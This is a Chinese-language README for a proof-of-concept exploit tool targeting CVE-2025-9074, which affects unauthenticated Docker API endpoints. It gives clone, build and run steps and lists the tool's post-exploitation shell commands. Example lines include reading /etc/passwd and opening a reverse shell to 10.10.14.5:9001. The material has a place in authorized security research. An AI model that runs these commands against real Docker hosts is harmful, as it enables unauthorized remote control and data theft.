Docker API CVE-2025-9074 PoC(概念验证)。一个针对CVE-2025-9074的复杂利用框架,针对未经认证的Docker API端点,并集成了交互式命令shell。
针对 CVE-2025-9074 的高级利用框架,目标为未经认证的 Docker API 端点,并集成交互式命令 Shell。
本工具自动利用暴露的、未启用认证机制的 Docker API 实例,允许在目标主机上创建完整容器并执行命令。该工具具备自定义交互式 Shell,可实现无缝的后渗透操作。
注意: 这是自定义的概念验证实现。我并未发现 CVE-2025-9074。

自动化漏洞检测、镜像拉取、容器创建与初始化

具备命令执行能力的后渗透 Shell
git clone https://github.com/xwpdx0/poc-2025-9074
gcc poc.c -o poc-2025-9074
或者您可以从 Releases 下载二进制文件。
./poc-2025-9074
针对默认目标 (127.0.0.1:2375) 执行:
./poc-2025-9074
指定自定义的 Docker API 端点:

成功利用后,交互式 Shell 提供以下命令:
| 命令 | 描述 |
|---|---|
cmd <command> | 在容器内执行任意命令 |
revshell <ip> <port> | 向指定监听器部署反向 Shell |
info | 显示当前容器及目标信息 |
(PoC-CVE-2025-9074)> cmd whoami
(PoC-CVE-2025-9074)> cmd cat /etc/passwd
(PoC-CVE-2025-9074)> cmd ls -la /mnt
(PoC-CVE-2025-9074)> revshell 10.10.14.5 9001
(PoC-CVE-2025-9074)> info
CVE-2025-9074 影响暴露了 API 端点且缺乏适当认证机制的 Docker 实例。这种配置错误允许未经授权访问 Docker 守护进程,从而实现:
本工具仅供 教育和授权安全测试 使用。
xwpd (@xwpdx0)
MIT 许可证 – 详见 LICENSE 文件
仅用于负责任的披露和安全研究。
exit |
| 终止交互式会话 |